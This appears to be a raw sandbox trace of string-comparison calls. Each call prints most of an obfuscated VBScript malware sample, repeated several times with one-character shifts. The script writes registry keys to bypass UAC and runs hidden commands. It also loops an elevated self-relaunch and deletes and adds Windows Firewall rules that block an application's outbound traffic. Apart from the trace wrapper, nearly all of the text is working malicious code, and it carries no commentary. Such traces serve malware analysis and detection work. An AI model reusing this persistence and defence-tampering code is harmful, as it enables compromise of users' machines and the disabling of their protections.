bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0226.328] wcsncmp (_String1="LE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.328] wcsncmp (_String1="E_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.329] wcsncmp (_String1="_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0226.329] wcsncmp (_String1="DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.329] wcsncmp (_String1="IR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 